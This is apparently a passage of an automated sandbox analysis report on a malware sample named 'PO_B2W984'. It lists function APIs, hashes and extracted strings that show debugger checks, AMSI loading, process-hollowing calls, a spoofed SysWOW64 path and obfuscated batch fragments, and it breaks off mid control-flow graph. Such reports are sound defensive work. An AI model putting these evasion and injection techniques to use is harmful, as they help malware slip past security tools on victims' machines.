                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 02DE8521
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                        • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                        • API String ID: 3503870465-2520021413
                                                                                                                                        • Opcode ID: 983a6c88d303dcdd81a896c0a8211f0bd770bb75e3178df84ae50b53a368a747
                                                                                                                                        • Instruction ID: 323392c159d3fe2828fcbbc0844673f1b47a710744ca3c309358d03ce875612c
                                                                                                                                        • Opcode Fuzzy Hash: 983a6c88d303dcdd81a896c0a8211f0bd770bb75e3178df84ae50b53a368a747
                                                                                                                                        • Instruction Fuzzy Hash: 81016774644608AFEF00FF65DC45E9E77AEEB49710F924854B406D7750DA30AD049F70
                                                                                                                                        Function 02DED9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 02DEDA64
                                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDAB6), ref: 02DEDA7A
                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 02DEDA99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1459852867-0
                                                                                                                                        • Opcode ID: 1dc7d71760bf2b0dd8ee49774368b5c3ac817012f3a45ff4dd195317619408f1
                                                                                                                                        • Instruction ID: 5922adf724455695cd043a27d8d3dccda4e42c71c46961c15b224ba16626d046
                                                                                                                                        • Opcode Fuzzy Hash: 1dc7d71760bf2b0dd8ee49774368b5c3ac817012f3a45ff4dd195317619408f1
                                                                                                                                        • Instruction Fuzzy Hash: 2E014F7594C2486EEF05F6A08D41BCD77BEEB54704F5040929212E6281DE74AF088B31
                                                                                                                                        Function 02DEDA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4EDA
                                                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 02DEDA64
                                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDAB6), ref: 02DEDA7A
                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 02DEDA99
                                                                                                                                          • Part of subcall function 02DD4C0C: SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1694942484-0
                                                                                                                                        • Opcode ID: 88761190cb1d8fe2293db7536192b3530b5b12bd86a19e114d0ccaeb6836ecb2
                                                                                                                                        • Instruction ID: 07c1b713599c51f3feac1060fe7da9c7cff8209f5aa7236abcb4bee9f4ca6182
                                                                                                                                        • Opcode Fuzzy Hash: 88761190cb1d8fe2293db7536192b3530b5b12bd86a19e114d0ccaeb6836ecb2
                                                                                                                                        • Instruction Fuzzy Hash: 2401E171948608BADF11FAE4CD41FDEB7BEEB48700F504561A501E6280EB756F049E74
                                                                                                                                        Function 02DE6D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE6CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02DE6D39,?,?,?,00000000), ref: 02DE6D19
                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,02DE6E2C,00000000,00000000,02DE6DAB,?,00000000,02DE6E1B), ref: 02DE6D97
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFromInstanceProg
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2151042543-0
                                                                                                                                        • Opcode ID: 326c53ecee0ec1b89c89a0b96be7270db5f6ef1d2c728986ea332e5ecc77bc9a
                                                                                                                                        • Instruction ID: f84df7951933eb4bc9a9f8f9138c427c6178fedd225825762687d20ebfcccc34
                                                                                                                                        • Opcode Fuzzy Hash: 326c53ecee0ec1b89c89a0b96be7270db5f6ef1d2c728986ea332e5ecc77bc9a
                                                                                                                                        • Instruction Fuzzy Hash: 2D01F231208B04AEEB15FF60EC2286FBBADE749B10F924835F502D2780E630DD04C8B0
                                                                                                                                        Function 02DEEC6C Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InetIsOffline.URL(00000000,00000000,02DFAF99,?,?,?,000002F7,00000000,00000000), ref: 02DEECA6
                                                                                                                                          • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                          • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                          • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                          • Part of subcall function 02DEEB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02DEEF90,UacInitialize,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString), ref: 02DEEB92
                                                                                                                                          • Part of subcall function 02DEEB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DEEBA4
                                                                                                                                          • Part of subcall function 02DEEBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DEEBF8
                                                                                                                                          • Part of subcall function 02DEEBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DEEC0A
                                                                                                                                          • Part of subcall function 02DEEBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DEEC21
                                                                                                                                          • Part of subcall function 02DD7E10: GetFileAttributesA.KERNEL32(00000000,?,02DEF8C4,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,UacInitialize), ref: 02DD7E1B
                                                                                                                                          • Part of subcall function 02DDC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F258C8,?,02DEFBF6,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession), ref: 02DDC2FB
                                                                                                                                          • Part of subcall function 02DEDBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDBE3
                                                                                                                                          • Part of subcall function 02DEDBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDC13
                                                                                                                                          • Part of subcall function 02DEDBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DEDC28
                                                                                                                                          • Part of subcall function 02DEDBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DEDC54
                                                                                                                                          • Part of subcall function 02DEDBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DEDC5D
                                                                                                                                          • Part of subcall function 02DD7E34: GetFileAttributesA.KERNEL32(00000000,?,02DF2A41,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,Initialize), ref: 02DD7E3F
                                                                                                                                          • Part of subcall function 02DD7FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02DF2BDF,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,Initialize,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0), ref: 02DD7FD5
                                                                                                                                          • Part of subcall function 02DEDAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDB96), ref: 02DEDB03
                                                                                                                                          • Part of subcall function 02DEDAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DEDB3D
                                                                                                                                          • Part of subcall function 02DEDAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DEDB6A
                                                                                                                                          • Part of subcall function 02DEDAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DEDB73
                                                                                                                                          • Part of subcall function 02DE8798: LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                          • Part of subcall function 02DE8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                          • Part of subcall function 02DE8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                          • Part of subcall function 02DE8704: LoadLibraryW.KERNEL32(amsi), ref: 02DE870D
                                                                                                                                          • Part of subcall function 02DE8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DE876C
                                                                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,02DFB328), ref: 02DF49AF
                                                                                                                                          • Part of subcall function 02DEDA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02DEDA64
                                                                                                                                          • Part of subcall function 02DEDA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDAB6), ref: 02DEDA7A
                                                                                                                                          • Part of subcall function 02DEDA3C: NtDeleteFile.NTDLL(?), ref: 02DEDA99
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02DF4BAF
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02DF4C05
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                        • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                        • API String ID: 2010126900-181751239
                                                                                                                                        • Opcode ID: 6f4ce8407f80e37aa3d14da98de72d75bbf316d725a86c00a52e4101f509e7a6
                                                                                                                                        • Instruction ID: e2c33cc865a4e00661cf8a67fe199184ce0a7747ef3b98dbb5709dea40e5cd0f
                                                                                                                                        • Opcode Fuzzy Hash: 6f4ce8407f80e37aa3d14da98de72d75bbf316d725a86c00a52e4101f509e7a6
                                                                                                                                        • Instruction Fuzzy Hash: A4243475A405589FDB61FB64DC80ADE73B6FF84300F1240E6E10AAB758DA70AE85CF64
                                                                                                                                        Function 02DF7870 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 5348 2df7870-2df7c5f call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd4898 5463 2df8ae9-2df8c6c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd4898 5348->5463 5464 2df7c65-2df7e38 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd4798 call 2dd494c call 2dd4d20 call 2dd4d9c CreateProcessAsUserW 5348->5464 5553 2df9418-2dfaa1d call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c * 16 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2dd46a4 * 2 call 2de881c call 2de7b90 call 2de8184 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c ExitProcess 5463->5553 5554 2df8c72-2df8c81 call 2dd4898 5463->5554 5571 2df7e3a-2df7eb1 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 5464->5571 5572 2df7eb6-2df7fc1 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 5464->5572 5554->5553 5564 2df8c87-2df8f5a call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dee538 call 2dd480c call 2dd494c call 2dd46a4 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd7e10 5554->5564 5822 2df9212-2df9413 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd49a4 call 2de8ba8 5564->5822 5823 2df8f60-2df920d call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd4d8c * 2 call 2dd4734 call 2dedac4 5564->5823 5571->5572 5674 2df7fc8-2df82e8 call 2dd49a4 call 2dedc88 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2decf9c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c 5572->5674 5675 2df7fc3-2df7fc6 5572->5675 5991 2df82ea-2df82fc call 2de857c 5674->5991 5992 2df8301-2df8ae4 call 2dd480c call 2dd494c call 2dd46a4 call 2dd4798 call 2dd494c call 2dd46a4 call 2de881c call 2dd480c call 2dd494c call 